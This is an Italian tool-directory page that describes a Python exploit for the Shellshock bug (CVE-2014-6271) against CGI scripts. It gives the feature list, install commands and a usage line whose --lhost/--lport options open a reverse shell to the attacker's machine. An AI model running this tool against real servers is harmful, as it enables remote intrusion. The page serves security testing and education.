Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Shellshock_vuln_Exploit — Exploit Python per CVE-2014-6271 (Shellshock) che prende di mira script CGI vulnerabili con handler di reverse shell, con supporto per HTTP/HTTPS, percorsi personalizzati e proxy. | Kitploit
Strumenti/GitHubGitHub/knightc0de/shellshock_vuln_exploit
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubknightc0de/shellshock_vuln_exploit

Shellshock_vuln_Exploit

Exploit Python per CVE-2014-6271 (Shellshock) che prende di mira script CGI vulnerabili con handler di reverse shell, con supporto per HTTP/HTTPS, percorsi personalizzati e proxy.

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🚨 Exploit RCE Shellshock (CVE-2014-6271)

Questo è un exploit in Python per la vulnerabilità Shellshock (CVE-2014-6271), che colpisce GNU Bash. L'exploit prende di mira script CGI su server web vulnerabili e stabilisce una reverse shell verso la macchina dell'attaccante.


ID CVE

CVE-2014-6271


Disclaimer

Questo strumento è destinato solo a scopi educativi ed etici.


Funzionalità

  • Sfrutta script CGI vulnerabili usando Shellshock
  • Gestore reverse shell
  • Supporta:
    • HTTP e HTTPS
    • Percorsi CGI personalizzati
    • supporto proxy
  • Shell interattiva in caso di successo

Informazioni sulla CVE

  • CVE: CVE-2014-6271
  • Vulnerabilità: iniezione di comandi nelle variabili d'ambiente di GNU Bash
  • Impatto: Remote Code Execution (RCE) tramite header modificati verso applicazioni CGI

Requisiti

  • Python 3.x
  • pwntools
  • requests

Installazione

root@kitploit:~
sudo python3 -m pip install pwntools
sudo python3 -m pip install requests
git clone https://github.com/knightc0de/Shellshock_vuln_Exploit.git
cd Shellshock_vuln_Exploit/
chmod +x CVE-2014-6271.py

Esempio di Utilizzo

root@kitploit:~
python3 CVE-2014-6271 --rhost <target_ip> --lhost <your_ip> --lport <your_port> --pages /cgi-bin/test.cg
Scarica lo strumento